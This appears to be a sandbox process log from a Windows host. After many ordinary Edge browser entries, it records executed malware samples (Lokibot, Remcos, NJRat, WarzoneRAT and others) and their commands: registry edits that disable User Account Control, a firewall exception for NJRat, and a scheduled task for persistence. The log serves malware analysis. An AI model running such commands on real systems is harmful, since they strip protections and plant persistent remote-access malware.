C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3504 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7676 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7204 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7256 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:8
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Users\Admin\Downloads\RevengeRAT.exe
"C:\Users\Admin\Downloads\RevengeRAT.exe"
C:\Users\Admin\Downloads\RevengeRAT.exe
"C:\Users\Admin\Downloads\RevengeRAT.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
C:\Windows\SysWOW64\PING.EXE
PING 127.0.0.1 -n 2
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Downloads\WarzoneRAT.exe
"C:\Users\Admin\Downloads\WarzoneRAT.exe"
C:\Users\Admin\Downloads\WarzoneRAT.exe
"C:\Users\Admin\Downloads\WarzoneRAT.exe"
C:\Windows\SysWOW64\Userdata\Userdata.exe
"C:\Windows\SysWOW64\Userdata\Userdata.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp18F8.tmp"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1612 -ip 1612
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1144
C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
C:\Users\Admin\Downloads\CrimsonRAT.exe
"C:\Users\Admin\Downloads\CrimsonRAT.exe"
C:\Users\Admin\Downloads\CrimsonRAT.exe
"C:\Users\Admin\Downloads\CrimsonRAT.exe"
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lez4qvtp.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7214.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6120206E2E57417489CC5C21FE6E746.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y10uxcsq.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72DF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFCCAE8D1863E401A8C5BF2FAD33B5CDE.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vlc3aipl.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES739B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF83A07F0A9EC4358AC9DF5B228FC559.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xclkbl-s.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7437.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5B53060A767642D5BAD7C3F86FC8AD56.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\noklzuac.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74C4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2A63C4C122344DF6BD8B34BFAEE25A6.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gzx6q4o5.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7570.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE376DC9813E74C9187DE535CDFC33BA.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iboznvtg.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75ED.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3597E38B45924308A055D2A115223717.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1y9vvug0.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES765A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcED5B2FB5BE204D8AA1BF6861ECFBF4.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rcv53xrr.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7735.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCFFA0F3E84A84B7C966294A97EE43691.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zrkadol9.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77D1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcABF9B84113644AB7AC801EDBF982593E.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w8jr4wsp.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES789C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7C466AE3B5CB4C25AD2CAD8637F3533.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ugeodnid.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7938.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc10CC050DE24A4F1AA2C399C3EB6CE5BD.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9qdtg91x.cmdline"
